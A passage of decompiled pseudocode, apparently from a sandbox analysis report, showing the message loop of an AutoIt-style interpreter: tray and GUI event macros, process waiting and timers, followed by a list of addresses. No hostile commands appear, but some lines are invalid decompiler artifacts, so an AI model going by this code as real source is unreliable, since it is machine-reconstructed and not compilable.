																				if(__eax == 0) {
																					goto L212;
																				}
																				__ecx = __eax;
																				L210:
																				__eax = E00405A64(__ecx);
																				_push(_v356);
																				L211:
																				__eax = L0042106C();
																				__esp = __esp + 4;
																				goto L212;
																			case 7:
																				__ecx = _v324;
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = E00457405(__ebx, __ecx, __edi, __ecx);
																				}
																				goto L212;
																		}
																	}
																}
																goto L196;
															}
															_t799 = _t799 - 1;
															__eflags = _t799;
															if(_t799 >= 0) {
																goto L196;
															}
															goto L187;
														}
													} else {
														goto L176;
													}
													do {
														L176:
														_t647 =  *((intOrPtr*)( *((intOrPtr*)(_t798 + _t874 * 4))));
														__eflags = _t647 - 0x24;
														if(_t647 == 0x24) {
															L179:
															_t874 = _t874 + 1;
															__eflags = _t874;
															goto L180;
														}
														__eflags = _t647 - 0x1e;
														if(_t647 != 0x1e) {
															goto L180;
														}
														_t838 = 0x100;
														goto L179;
														L180:
														_t648 =  *((intOrPtr*)(_t798 + _t874 * 4));
														__eflags =  *((short*)(_t648 + 8));
													} while ( *((short*)(_t648 + 8)) == 0);
													_v256 = _t838;
													_v288 = _t874;
													goto L182;
													L214:
													_v344 = _v344 + 4;
													_t874 = _t876 + _v328 + 1;
													_t630 = _v340 + 1;
													_v288 = _t874;
													_v340 = _t630;
													__eflags = _t630 -  *((intOrPtr*)(_v332 + 0x14));
												} while (__eflags <= 0);
												goto L215;
											}
											_t841 = _v124 + 8;
											__eflags = _t841;
											_v328 = _t841;
											while(1) {
												_t802 =  *((intOrPtr*)(_t520 + 4));
												_v340 = _t802;
												_t649 =  *((intOrPtr*)(_t802 + _t873 * 4));
												__eflags =  *((short*)(_t649 + 8));
												if( *((short*)(_t649 + 8)) != 0) {
													goto L155;
												}
												L147:
												_t837 =  *(_v304 + 4);
												do {
													_t656 =  *((intOrPtr*)(_t837 + 4 + _t873 * 4));
													__eflags =  *((short*)(_t656 + 8)) - 0x33;
													if( *((short*)(_t656 + 8)) == 0x33) {
														L151:
														_t658 =  *((intOrPtr*)( *((intOrPtr*)(_t837 + _t873 * 4))));
														__eflags = _t658 - 0x24;
														if(_t658 == 0x24) {
															goto L153;
														}
														__eflags = _t658 - 0x1e;
														if(_t658 != 0x1e) {
															L167:
															E0046A0B5(_t846, _t931, 0x91,  *((short*)( *((intOrPtr*)( *(_v304 + 4) + 4 + _t873 * 4)) + 0xa)));
															goto L172;
														}
														goto L153;
													}
													__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t837 + _t873 * 4)))) -  *_t656;
													if( *((intOrPtr*)( *((intOrPtr*)(_t837 + _t873 * 4)))) ==  *_t656) {
														goto L167;
													}
													_t802 = _v340;
													goto L151;
													L153:
													_t659 =  *((intOrPtr*)(_t802 + 4 + _t873 * 4));
													_t873 = _t873 + 1;
													__eflags =  *((short*)(_t659 + 8));
												} while ( *((short*)(_t659 + 8)) == 0);
												_t841 = _v328;
												L155:
												_t650 =  *((intOrPtr*)(_t802 + 4 + _t873 * 4));
												_t877 = _t873 + 1;
												__eflags =  *((short*)(_t650 + 8)) - 0x41;
												if( *((short*)(_t650 + 8)) != 0x41) {
													L162:
													E00456665(_t747,  &_v180,  *_t841);
													_t873 = _t877 + 1;
													_t652 = _v336;
													_t805 = _v268 + 1;
													_t841 = _v332 + 4;
													_v268 = _t805;
													_v332 = _v332 + 4;
													__eflags = _t805 -  *((intOrPtr*)(_t652 + 0x14));
													if(_t805 >=  *((intOrPtr*)(_t652 + 0x14))) {
														_t837 = _v332;
														_v344 = _v176;
														goto L174;
													}
													_t520 = _v304;
													_t802 =  *((intOrPtr*)(_t520 + 4));
													_v340 = _t802;
													_t649 =  *((intOrPtr*)(_t802 + _t873 * 4));
													__eflags =  *((short*)(_t649 + 8));
													if( *((short*)(_t649 + 8)) != 0) {
														goto L155;
													}
													goto L147;
												}
												_t843 = _v340;
												_t877 = _t877 + 1;
												_t806 = 0;
												__eflags = 0;
												while(1) {
													_t655 =  *( *((intOrPtr*)(_t843 + _t877 * 4)) + 8) & 0x0000ffff;
													__eflags = _t655 - 0x47;
													if(_t655 != 0x47) {
														goto L159;
													}
													L158:
													_t806 = _t806 + 1;
													L166:
													_t877 = _t877 + 1;
													_t655 =  *( *((intOrPtr*)(_t843 + _t877 * 4)) + 8) & 0x0000ffff;
													__eflags = _t655 - 0x47;
													if(_t655 != 0x47) {
														goto L159;
													}
													goto L158;
													L159:
													__eflags = _t655 - 0x48;
													if(_t655 != 0x48) {
														__eflags = _t655 - 0x40;
														if(_t655 != 0x40) {
															goto L166;
														}
														__eflags = _t806;
														if(_t806 == 0) {
															L161:
															_t841 = _v328;
															goto L162;
														}
														goto L166;
													}
													_t806 = _t806 - 1;
													__eflags = _t806;
													if(_t806 >= 0) {
														goto L166;
													}
													goto L161;
												}
											}
										}
										L33:
										if( *0x4c6930 != 0) {
											__eflags =  *((char*)(_t846 + 0x459)) - 1;
											if(__eflags == 0) {
												goto L34;
											}
											E004077C7( &(_v216.message), __eflags);
											while(1) {
												_t498 = E004628F7(0x4c6890,  &_v216);
												__eflags = _t498;
												if(_t498 == 0) {
													break;
												}
												__eflags = _v216.wParam;
												if(_v216.wParam == 0) {
													continue;
												}
												_t870 = E00409FBD(_t846,  &(_v216.message));
												__eflags = _t870;
												if(_t870 == 0) {
													continue;
												}
												_v148 = 0;
												_v140 = 0;
												_v136 = 1;
												E00409A20(_t747,  &_v148);
												_v136 = 1;
												_v148 = _v216.hwnd;
												E00407F41(_t747,  &_v96, __eflags, L"@TRAY_ID");
												E00408B13(0x4c7270, _t837, _t846, __eflags,  &_v100,  &_v152, 1);
												E00405A64( &_v112);
												 *((char*)(_t846 + 0x459)) = 1;
												E0040B89C(_t846, _t837, _t931,  *((intOrPtr*)(_t870 + 0x10)) + 1, 1, 0);
												 *((char*)(_t846 + 0x459)) = 0;
												E00409A20(_t747,  &_v176);
												_t752 =  &_v240;
												E00405A64(_t752);
												goto L51;
											}
											_t752 =  &(_v216.message);
											E00405A64(_t752);
										}
										L34:
										_t494 =  *(_t846 + 0xf8);
										if(_t494 == 7) {
											_t495 = WaitForSingleObject( *(_t846 + 0x444), 0xa);
											_v292 = _t495;
											__eflags = _t495 - 0x102;
											if(__eflags == 0) {
												goto L51;
											}
											GetExitCodeProcess( *(_t846 + 0x444),  &_v292);
											CloseHandle( *(_t846 + 0x444));
											_v356 = _v292;
											L265:
											_push(_t752);
											_t752 =  *((intOrPtr*)( *_t846 + 4)) + _t846;
											E0041FF13(_t752,  &_v356);
											L97:
											 *((char*)(_t846 + 0x144)) = 1;
											 *(_t846 + 0xf8) = 0;
											goto L51;
										}
										if(_t494 == 2) {
											L84:
											Sleep(0xa); // executed
											__eflags =  *(_t846 + 0x2f0);
											if( *(_t846 + 0x2f0) == 0) {
												L88:
												_t674 =  *(_t846 + 0xf8);
												__eflags = _t674 - 3;
												if(__eflags < 0) {
													goto L51;
												}
												_t675 = _t674 - 3;
												__eflags = _t675 - 3;
												if(__eflags > 0) {
													goto L51;
												} else {
													switch( *((intOrPtr*)(_t675 * 4 +  &M0044613D))) {
														case 0:
															__ecx = __edi;
															__eax = E0040B93D(__ecx, __edx, __eflags, __fp0, 1);
															goto L297;
														case 1:
															__ecx = __edi;
															__eax = E0040B93D(__ecx, __edx, __eflags, __fp0, 1);
															goto L293;
														case 2:
															_t752 = _t846;
															_t676 = E004861AC(_t752, _t837, __eflags, _t931);
															L297:
															_t861 = _t676;
															__eflags = _t861;
															if(__eflags >= 0) {
																goto L299;
															}
															goto L298;
														case 3:
															__ecx = __edi;
															__eax = E004861AC(__ecx, __edx, __eflags, __fp0);
															L293:
															__esi = __eax;
															__eflags = __esi;
															if(__eflags < 0) {
																L298:
																_t827 =  *((intOrPtr*)( *_t846 + 4)) + _t846;
																E00456AA3(_t827,  ~_t861, 0);
																_push(_t827);
																_v364 = 0;
																_t752 =  *((intOrPtr*)( *_t846 + 4)) + _t846;
																_t676 = E0041FF13(_t752,  &_v364);
																__eflags = _t861;
																L299:
																if(__eflags == 0) {
																	goto L51;
																}
																__eflags = _t861;
																if(_t861 <= 0) {
																	L304:
																	_t752 =  *(_t846 + 0x2f4);
																	 *((char*)(_t846 + 0x144)) = 1;
																	 *(_t846 + 0xf8) = 0;
																	E004654E6(_t676, _t752, _t931);
																	goto L51;
																}
																L301:
																_t676 =  *(_t846 + 0xf8);
																__eflags = _t676 - 5;
																if(_t676 == 5) {
																	L303:
																	_v164 = 0;
																	_v156 = 0;
																	_v152 = 1;
																	E00409A20(_t747,  &_v164);
																	_v152 = 7;
																	_v164 =  *( *(_t846 + 0x1f0));
																	__eflags =  *((intOrPtr*)( *_t846 + 4)) + _t846;
																	E00456A50( *((intOrPtr*)( *_t846 + 4)) + _t846, _t846,  &_v164, 0);
																	_t676 = E00409A20(_t747,  &_v172);
																	goto L304;
																}
																__eflags = _t676 - 3;
																if(_t676 != 3) {
																	goto L304;
																}
																goto L303;
															}
															if(__eflags > 0) {
																goto L51;
															}
															goto L301;
													}
												}
												goto L90;
											}
											_t752 =  *(_t846 + 0x2f8);
											_t689 = E00420719(_t752);
											__eflags = _t837;
											if(__eflags < 0) {
												goto L88;
											}
											if(__eflags > 0) {
												L96:
												__eflags =  *(_t846 + 0xf8) - 2;
												if(__eflags != 0) {
													_v356 = 0;
													goto L265;
												}
												goto L97;
											}
											__eflags = _t689 -  *(_t846 + 0x2f0);
											if(_t689 >=  *(_t846 + 0x2f0)) {
												goto L96;
											}
											goto L88;
										}
										if(_t494 == 8 || _t494 == 9) {
											Sleep(0xa);
											__eflags =  *(_t846 + 0x43c);
											if( *(_t846 + 0x43c) == 0) {
												L311:
												_t690 =  *(_t846 + 0xf8);
												_t863 = 0;
												_v333 = 0;
												_v356 = 0;
												__eflags = _t690 - 8;
												if(_t690 != 8) {
													__eflags = _t690 - 9;
													if(__eflags != 0) {
														goto L51;
													}
													L315:
													_t752 =  *(_t846 + 0x448);
													_t691 = 0xcccccccc;
													_v300 = 0xcccccccc;
													__eflags = _t752;
													if(_t752 == 0) {
														L319:
														__eflags =  *(_t846 + 0xf8) - 8;
														if( *(_t846 + 0xf8) != 8) {
															_t752 =  *((intOrPtr*)( *_t846 + 4)) + _t846;
															__eflags = _t752;
															E0041FF61(_t747, _t752, _t691, 0);
														} else {
															_v356 = _t863;
															asm("fild dword [esp+0x8]");
															__eflags = _t863;
															if(__eflags < 0) {
																_t931 = _t931 +  *0x4bbac8;
															}
															_push(_t752);
															_v356 = _t931;
															_t752 =  *((intOrPtr*)( *_t846 + 4)) + _t846;
															E0047CC41(_t747, _t752,  &_v356);
														}
														 *((char*)(_t846 + 0x144)) = 1;
														 *(_t846 + 0xf8) = 0;
														Sleep( *(_t846 + 0x2f4));
														goto L51;
													}
													GetExitCodeProcess(_t752,  &_v300);
													__eflags = _v300 - 0x103;
													if(_v300 != 0x103) {
														L318:
														CloseHandle( *(_t846 + 0x448));
														_t691 = _v300;
														 *(_t846 + 0x448) = 0;
														goto L319;
													}
													__eflags = WaitForSingleObject( *(_t846 + 0x448), 0);
													if(__eflags != 0) {
														goto L51;
													}
													goto L318;
												}
												_t752 = _t846 + 0x42c;
												_t837 =  &_v356;
												E00463E91(_t752,  &_v356, _t931,  &_v333);
												_t884 = _t884 + 4;
												__eflags = _v333 - 1;
												if(__eflags != 0) {
													goto L51;
												}
												_t863 = _v356;
												goto L315;
											}
											_t752 =  *(_t846 + 0x440);
											_t703 = E00420719(_t752);
											__eflags = _t837;
											if(__eflags < 0) {
												goto L311;
											}
											if(__eflags > 0) {
												L309:
												_t704 =  *(_t846 + 0x448);
												__eflags = _t704;
												if(__eflags != 0) {
													CloseHandle(_t704);
													 *(_t846 + 0x448) = 0;
												}
												_v356 = 0;
												goto L265;
											}
											__eflags = _t703 -  *(_t846 + 0x43c);
											if(_t703 <  *(_t846 + 0x43c)) {
												goto L311;
											}
											goto L309;
										} else {
											if(_t494 == 3 || _t494 == 4 || _t494 == 5 || _t494 == 6) {
												goto L84;
											} else {
												_t864 = _a4;
												_a4 = _a4 + 1;
												 *(_t846 + 0xf4) = _t864;
												_t921 = _t864 -  *0x4c72a0; // 0x25a3
												if(_t921 > 0 || _t864 <= 0) {
													L287:
													 *(_t846 + 0xf8) = 1;
													goto L51;
												} else {
													_t866 = (_t864 << 4) +  *0x4c72dc;
													if(_t866 == 0) {
														goto L287;
													}
													_t837 = 0;
													_v284 = 0;
													_v276 = 0;
													_v272 = 1;
													_t707 =  *((intOrPtr*)( *((intOrPtr*)(_t866 + 4))));
													_v356 = _t707;
													_v344 = 0;
													_v332 = 0;
													_t708 =  *((short*)(_t707 + 8));
													if(_t708 != 0) {
														__eflags = _t708 - 0x33;
														if(_t708 != 0x33) {
															_t709 = _t708 - 1;
															__eflags = _t709 - 0x7e;
															if(__eflags > 0) {
																L269:
																_t712 = E0040A000(_t747, _t846, _t931, _t866,  &_v332,  &_v284, 0xffffffff);
																L72:
																__eflags = _t712;
																if(__eflags < 0) {
																	L47:
																	_t867 = _v276;
																	if(_t867 != 0) {
																		 *( *(_t867 + 0xc)) =  *( *(_t867 + 0xc)) - 1;
																		__eflags =  *( *(_t867 + 0xc));
																		if( *( *(_t867 + 0xc)) == 0) {
																			L0042106C( *_t867);
																			L0042106C( *(_t867 + 0xc));
																			_t884 = _t884 + 8;
																		}
																		L0042106C(_t867);
																		_t884 = _t884 + 4;
																		_v276 = 0;
																	}
																	_t837 = _v284;
																	_t752 = _v272;
																	_v344 = _v284;
																	L49:
																	if(_t752 >= 5) {
																		_t752 = _t752 + 0xfffffffb;
																		__eflags = _t752 - 0xa;
																		if(__eflags > 0) {
																			goto L50;
																		}
																		switch( *((intOrPtr*)(_t752 * 4 +  &M004111A4))) {
																			case 0:
																				__eflags = __edx;
																				if(__eflags != 0) {
																					__ecx = __edx;
																					__eax = E00408E34(__ecx, __edi, __eflags, __ecx);
																				}
																				goto L50;
																			case 1:
																				goto L50;
																			case 2:
																				__eflags = __edx;
																				if(__eflags == 0) {
																					goto L50;
																				}
																				_push(__edx);
																				__imp__#9();
																				_push(_v288);
																				goto L286;
																			case 3:
																				__eflags = __edx;
																				if(__eflags == 0) {
																					goto L50;
																				}
																				__ecx = __edx + 8;
																				goto L285;
																			case 4:
																				__eax = L0042106C( *((intOrPtr*)(__edx + 4)));
																				_push(_v284);
																				goto L286;
																			case 5:
																				__eflags = __edx;
																				if(__eflags != 0) {
																					__ecx = __edx;
																					__eax = E004573F0(__ecx, __ecx);
																				}
																				goto L50;
																			case 6:
																				__eflags = __edx;
																				if(__eflags == 0) {
																					goto L50;
																				}
																				__ecx = __edx;
																				L285:
																				__eax = E00405A64(__ecx);
																				_push(_v344);
																				L286:
																				__eax = L0042106C();
																				__esp = __esp + 4;
																				goto L50;
																			case 7:
																				__eflags = __edx;
																				if(__eflags != 0) {
																					__ecx = __edx;
																					__eax = E00457405(__ebx, __ecx, __edi, __ecx);
																				}
																				goto L50;
																		}
																	}
																	L50:
																	_v272 = 1;
																	_v284 = 0;
																	goto L51;
																}
																_t719 =  *((intOrPtr*)( *((intOrPtr*)(_t866 + 4)) + _v332 * 4));
																__eflags =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t866 + 4)) + _v332 * 4)) + 8)) - 0x7f;
																if(__eflags == 0) {
																	goto L47;
																}
																E0046A0B5(_t846, _t931, 0x72,  *((short*)(_t719 + 0xa)));
																_t752 =  &_v292;
																E00409DF0(_t747, _t752);
																goto L51;
															}
															_t63 = _t709 + 0x411124; // 0x4040000
															switch( *((intOrPtr*)(( *_t63 & 0x000000ff) * 4 +  &M00411110))) {
																case 0:
																	_t712 = E0040F5C0(_t747, _t846, _t931, 0, _t866,  &_v332,  &_v284); // executed
																	goto L72;
																case 1:
																	__eax =  &_v257;
																	__ecx = __edi;
																	 &_v284 =  &_v332;
																	__eax = E0040FE40(__ecx, __fp0, 0, __esi,  &_v332,  &_v284,  &_v257); // executed
																	goto L72;
																case 2:
																	__ecx = __edi + 0x168;
																	__ecx = E0047C2F7(__edi + 0x168);
																	__eax = E00456543(__eax);
																	__eflags = __al;
																	if(__al != 0) {
																		__ecx = __edi + 0x168;
																		E0047C2F7(__edi + 0x168) =  &_v332;
																		__ecx = __edi;
																		__eax = E0047B851(__ecx, __edx, __fp0, __esi,  &_v332,  &_v332);
																		goto L72;
																	}
																	__eax = _v356;
																	__ecx = __edi;
																	 *((short*)(_v356 + 0xa)) = E0046A0B5(__edi, __fp0, 0xa7,  *((short*)(_v356 + 0xa)));
																	__ecx =  &_v292;
																	__eax = E00409DF0(__ebx, __ecx);
																	goto L51;
																case 3:
																	goto L49;
																case 4:
																	goto L269;
															}
														}
														E0040E800(_t846, _t931, _t866); // executed
														goto L47;
													}
													E0040E580(_t846, _t931, _t866,  &_a4); // executed
													goto L47;
												}
											}
										}
									} else {
										_t906 =  *0x4c67e8 - 1;
										if( *0x4c67e8 != 1) {
											_v216.wParam = 0;
											_v216.lParam = 8;
											_t22 = 8 * _t837;
											_t837 = 8 * _t837 >> 0x20;
											_t541 = E00420FF6(_t747, _t846, _t906,  ~(0 | _t906 > 0x00000000) | _t22);
											_v216.message = _t541;
											_t752 = 0;
											 *_t541 = 0;
											_t542 = E00420FF6(_t747, _t846, _t906, 4);
											_t884 = _t884 + 8;
											if(_t542 == 0) {
												_t542 = 0;
											} else {
												 *_t542 = 1;
											}
											_v192 = _t542;
											while( *0x4c67dc != 0) {
												_t543 =  *0x4c67e0; // 0x0
												_t868 =  *_t543;
												E0048629F( &(_v216.wParam), _t868);
												_t752 = 0x4c67dc;
												E0040467D(0x4c67dc);
												__eflags = _t868;
												if(_t868 != 0) {
													_t752 = _t868;
													E00404665(_t752, 0x4c67dc);
												}
												__eflags = _v216.time;
												 *0x4c7420 = 0;
												if(__eflags == 0) {
													continue;
												} else {
													_t752 = _t846;
													_t549 = E00409FBD(_t752,  &(_v216.lParam));
													_t878 = _t549;
													__eflags = _t549;
													if(__eflags == 0) {
														continue;
													}
													_v244 = 0;
													_v236 = 0;
													_v232 = 1;
													E00409A20(_t747,  &_v244);
													_v232 = 1;
													_v244 = _v216.wParam;
													E00407F41(_t747,  &_v56, __eflags, L"@GUI_CTRLID");
													E00408B13(0x4c7270, _t837, _t846, __eflags,  &_v60,  &_v248, 1);
													E00405A64( &_v72);
													E00409A20(_t747,  &_v260);
													_v248 = 7;
													_v260 = _v216.lParam;
													E00407F41(_t747,  &_v120, __eflags, L"@GUI_WINHANDLE");
													E00408B13(0x4c7270, _t837, _t846, __eflags,  &_v124,  &_v264, 1);
													E00405A64( &_v136);
													E00409A20(_t747,  &_v276);
													_v264 = 7;
													_v276 = _v216.hwnd;
													E00407F41(_t747,  &_v104, __eflags, L"@GUI_CTRLHANDLE");
													E00408B13(0x4c7270, _t837, _t846, __eflags,  &_v108,  &_v280, 1);
													E00405A64( &_v120);
													 *((char*)(_t846 + 0x458)) = 1;
													E0040B89C(_t846, _t837, _t931,  *((intOrPtr*)(_t878 + 0x10)) + 1, 1, 0);
													 *((char*)(_t846 + 0x458)) = 0;
													E00409A20(_t747,  &_v304);
													_t752 =  &_v264;
													E00405A64(_t752);
													goto L51;
												}
											}
											if( *0x4c67bc == 0) {
												__eflags =  *0x4c691c;
												if(__eflags != 0) {
													L141:
													_push(0xa);
													L142:
													Sleep();
													goto L30;
												}
												__eflags =  *0x4c7420 - 0x64;
												if(__eflags >= 0) {
													goto L141;
												}
												 *0x4c7420 =  &( *0x4c7420->i);
												_push(0);
												goto L142;
											}
											L30:
											_t869 = _v192;
											 *_t869 =  *_t869 - 1;
											if( *_t869 == 0) {
												L0042106C(_v216.lParam);
												L0042106C(_t869);
												_t884 = _t884 + 8;
											}
										}
										goto L32;
									}
								} else {
									_t879 =  *((intOrPtr*)(_t846 + 0x44c));
									 *0x4c741c = 1;
									_v344 = 0;
									_v356 = _t846 + 0x44c;
									L16:
									L16:
									if(_t879 != 0) {
										goto L57;
									} else {
										_t849 = _v356;
										goto L18;
									}
									while(1) {
										L18:
										_t578 =  *_t849;
										while(1) {
											L19:
											_v340 = _t578;
											if(_t578 == 0) {
												break;
											}
											_t752 =  *_t578;
											__eflags =  *((char*)(_t752 + 0x11));
											if(__eflags != 0) {
												_t752 = _t849;
												E0046A3F3(_t752,  &_v340);
												L18:
												_t578 =  *_t849;
												continue;
											}
											_t578 =  *(_t578 + 4);
										}
										_t846 = _v296;
										 *0x4c741c = _t578;
										if(_v344 > _t578) {
											goto L51;
										} else {
											_t18 = _t578 + 2; // 0x2
											_t837 = _t18;
											goto L22;
										}
									}
									L57:
									_t577 =  *_t879;
									__eflags =  *((char*)(_t577 + 0x11));
									if(__eflags != 0) {
										L64:
										_t879 =  *((intOrPtr*)(_t879 + 4));
										goto L16;
									}
									_t850 =  *((intOrPtr*)(_t577 + 0x14));
									_t599 = timeGetTime();
									_t752 = _t599;
									_t837 = 0;
									_t600 = _t599 - _t850;
									__eflags = _t850 - 0x7fffffff;
									if(_t850 > 0x7fffffff) {
										__eflags = _t752 - 0x7fffffff;
										if(_t752 <= 0x7fffffff) {
											L61:
											_t851 =  *_t879;
											__eflags = _t837;
											if(__eflags < 0) {
												goto L64;
											}
											if(__eflags > 0) {
												L98:
												_v344 =  &(_v344->i);
												 *((intOrPtr*)(_t851 + 0x14)) = timeGetTime();
												_t602 = E00409FBD(_v296,  *_t879);
												 *((char*)( *_t879 + 0x10)) = 1;
												_t752 = _v300;
												E0040B89C(_t752, _t837, _t931,  *((intOrPtr*)(_t602 + 0x10)) + 1, 1, 0);
												 *((char*)( *_t879 + 0x10)) = 0;
												goto L64;
											}
											__eflags = _t600 -  *((intOrPtr*)(_t851 + 0x18));
											if(__eflags >= 0) {
												goto L98;
											}
											goto L64;
										}
										L60:
										asm("cdq");
										goto L61;
									}
									__eflags = _t752 - 0x7fffffff;
									if(_t752 > 0x7fffffff) {
										goto L61;
									}
									goto L60;
								}
							}
						}
						if( *0x4c67e8 != 0) {
							__eflags =  *(_t846 + 0xf8);
							if(__eflags == 0) {
								goto L11;
							}
						}
						if(PeekMessageW( &_v216, 0, 0, 0, 1) != 0) {
							while(1) {
								__eflags = _v216.message - 0x12;
								if(__eflags == 0) {
									break;
								}
								_t778 =  *0x4c67d8; // 0xffffffff
								__eflags = _t778 - 0xffffffff;
								if(_t778 != 0xffffffff) {
									__eflags = _t778 -  *0x4c6814; // 0x0
									if(__eflags >= 0) {
										L116:
										 *0x4c67d8 = 0xffffffff;
										goto L80;
									}
									_t594 =  *0x4c6810; // 0x3886548
									_t752 =  *(_t594 + _t778 * 4);
									_t595 =  *_t752;
									__eflags = _t595;
									if(_t595 == 0) {
										goto L116;
									}
									__eflags =  *(_t595 + 0x18);
									if( *(_t595 + 0x18) == 0) {
										goto L116;
									}
									_t598 = TranslateAcceleratorW( *( *_t752),  *( *_t752 + 0x18),  &_v216);
									__eflags = _t598;
									if(_t598 != 0) {
										L81:
										__eflags = PeekMessageW( &_v216, 0, 0, 0, 1);
										if(__eflags == 0) {
											goto L8;
										}
										continue;
									}
								}
								L80:
								_t752 = 0x4c67b0;
								_t587 = E004031CE(0x4c67b0,  &_v216);
								__eflags = _t587;
								if(_t587 == 0) {
									TranslateMessage( &_v216);
									DispatchMessageW( &_v216); // executed
								}
								goto L81;
							}
							 *((char*)(_t846 + 0xfc)) = 1;
							 *(_t846 + 0xf8) = 1;
						}
						L8:
						if( *0x4c6282 == 1) {
							 *0x4c6287 = 0;
							 *0x4c6282 = 0;
							 *(_t846 + 0xf8) = 1;
						}
						if( *(_t846 + 0xf8) == 1) {
							_push(_t752);
							_v292 = 0;
							E0041FF13( *((intOrPtr*)( *_t846 + 4)) + _t846,  &_v292);
							goto L53;
						} else {
							_t837 = 2;
							goto L11;
						}
					}
					goto L53;
				}
			}

0x00410b30
0x00410b30
0x00410b36
0x00410b3e
0x00410b40
0x00410b44
0x00410b4f
0x004450f4
0x00445100
0x00410e63
0x00410e68
0x00410e68
0x00410b55
0x00410b56
0x00410b5f
0x00411023
0x00411023
0x00411029
0x00411030
0x00411030
0x00411032
0x00000000
0x00000000
0x0044510c
0x00445111
0x00445113
0x0044511c
0x0044511e
0x0044511e
0x00445128
0x0044512c
0x00445131
0x00445131
0x00411030
0x00410b65
0x00410b6c
0x00410b73
0x00410e44
0x00410e44
0x00410e4a
0x00410e54
0x0041103f
0x00411044
0x0041104b
0x00410e61
0x00410e61
0x00000000
0x00410e61
0x00411053
0x0041105a
0x00411066
0x00411080
0x00411082
0x00411084
0x00000000
0x00000000
0x00446082
0x0044608a
0x00446098
0x004460ac
0x004460ae
0x004460ae
0x00000000
0x004460b2
0x00410e5b
0x00000000
0x00410b79
0x00410b7f
0x00410b86
0x00410b8b
0x00000000
0x00000000
0x00410b98
0x0044513a
0x00445141
0x00410be4
0x00410beb
0x004451de
0x004451e6
0x004451e9
0x004451ed
0x004451f2
0x004451f8
0x004451fb
0x00445203
0x00445205
0x00445207
0x0044520d
0x00445213
0x00445217
0x00445219
0x0044523f
0x0044523f
0x00445241
0x00445294
0x00000000
0x00445294
0x00445254
0x00445274
0x0044527c
0x00445284
0x00410e31
0x00410e37
0x00410e3e
0x00000000
0x00000000
0x00000000
0x00410e3e
0x0044521b
0x00445221
0x00445225
0x00445228
0x0044522a
0x0044522c
0x00000000
0x00000000
0x0044522e
0x00445230
0x00000000
0x00000000
0x00445232
0x00445232
0x00445233
0x00445233
0x00445237
0x0044523b
0x00000000
0x0044523b
0x00410bf1
0x00410bf8
0x0044529e
0x004452a5
0x00000000
0x00000000
0x004452ad
0x00000000
0x004452ad
0x00410bfe
0x00410c05
0x00410c64
0x00410c6b
0x00410d2d
0x00410d34
0x004454ad
0x004454b4
0x00000000
0x00000000
0x004454bc
0x004454d0
0x004454d8
0x004454e3
0x004454e7
0x004454ee
0x004454f5
0x004454fc
0x00445507
0x0044550c
0x0044551a
0x00445531
0x00445540
0x00445542
0x00445546
0x0044554a
0x0044554f
0x00445555
0x0044555a
0x0044555e
0x00445562
0x004456c2
0x004456c5
0x004456ce
0x004456d3
0x004456d7
0x004456df
0x004456e3
0x0044591a
0x00445926
0x00445934
0x0044594f
0x0044595b
0x0044596f
0x00445979
0x0044597e
0x00445985
0x00445987
0x0044598a
0x0044598f
0x0044598f
0x0044599a
0x004459a1
0x004459a4
0x00445af2
0x00445af9
0x00445b04
0x00445b0f
0x00445b14
0x00445b1b
0x00445b20
0x00000000
0x004459aa
0x004459aa
0x004459ad
0x004459b0
0x00000000
0x00000000
0x004459b6
0x00000000
0x00445aa7
0x00445aa9
0x00445aac
0x00445aae
0x00445aae
0x00000000
0x00000000
0x00000000
0x00000000
0x00445a91
0x00445a93
0x00000000
0x00000000
0x00445a95
0x00445a96
0x00000000
0x00000000
0x00445a9e
0x00445aa0
0x00000000
0x00000000
0x00445aa2
0x00000000
0x00000000
0x00445ab8
0x00000000
0x00000000
0x00445ac2
0x00445ac4
0x00445ac7
0x00445ac9
0x00445ac9
0x00000000
0x00000000
0x00445ade
0x00445ae0
0x00000000
0x00000000
0x00445ae2
0x00445ae4
0x00445ae4
0x00445ae9
0x00445aea
0x00000000
0x00000000
0x00445ad0
0x00445ad2
0x00445ad5
0x00445ad7
0x00445ad7
0x00000000
0x00000000
0x004459b6
0x00000000
0x00000000
0x00000000
0x004456e9
0x004456e9
0x004456ed
0x004456ef
0x004456f3
0x004456f6
0x004456fa
0x004456fd
0x00445701
0x0044572a
0x0044572a
0x0044572e
0x00445735
0x0044573d
0x0044573d
0x0044573f
0x00445743
0x00445746
0x0044574a
0x0044574e
0x00000000
0x00000000
0x00445750
0x00445750
0x0044582e
0x0044582e
0x0044582f
0x00445746
0x0044574a
0x0044574e
0x00000000
0x00000000
0x00000000
0x00445756
0x00445756
0x0044575a
0x00445820
0x00445824
0x00000000
0x00000000
0x00445826
0x00445828
0x00445767
0x0044576b
0x0044576f
0x00445773
0x00445777
0x0044577b
0x0044577f
0x004458db
0x004458ef
0x00000000
0x004458ef
0x00445788
0x00445790
0x0044579c
0x004457a9
0x004457bb
0x004457c0
0x004457c2
0x004459bd
0x004459c1
0x004459c3
0x004459c6
0x004459cb
0x004459cb
0x004459d3
0x004459d7
0x004459da
0x00445673
0x00445673
0x0044567b
0x00445683
0x0044568a
0x00445696
0x0044569b
0x004456a2
0x004456a7
0x00000000
0x004459e0
0x004459e0
0x004459e3
0x004459e6
0x00000000
0x00000000
0x004459ec
0x00000000
0x00445a23
0x00445a27
0x00445a29
0x00445a30
0x00445a30
0x00000000
0x00000000
0x00000000
0x00000000
0x004459f3
0x004459f7
0x004459f9
0x00000000
0x00000000
0x004459ff
0x00445a00
0x00445a06
0x00000000
0x00000000
0x00445a0f
0x00445a13
0x00445a15
0x00000000
0x00000000
0x00445a1b
0x00445a1b
0x00000000
0x00000000
0x00445a41
0x00445a49
0x00000000
0x00000000
0x00445a52
0x00445a56
0x00445a58
0x00445a5f
0x00445a5f
0x00000000
0x00000000
0x00445a80
0x00445a84
0x00445a86
0x00000000
0x00000000
0x00445663
0x00445665
0x00445665
0x0044566a
0x0044566b
0x0044566b
0x00445670
0x00000000
0x00000000
0x00445a69
0x00445a6d
0x00445a6f
0x00445a76
0x00445a76
0x00000000
0x00000000
0x004459ec
0x004459da
0x004457e5
0x004457ea
0x004457ee
0x004457f0
0x004457f3
0x004457f8
0x004457f8
0x00445800
0x00445804
0x00445807
0x004458c5
0x004458c5
0x004458cd
0x00000000
0x0044580d
0x0044580d
0x00445810
0x00445813
0x00000000
0x00000000
0x00445819
0x00000000
0x00445861
0x00445865
0x00445867
0x0044586a
0x0044586a
0x00000000
0x00000000
0x00000000
0x00000000
0x00445837
0x0044583b
0x0044583d
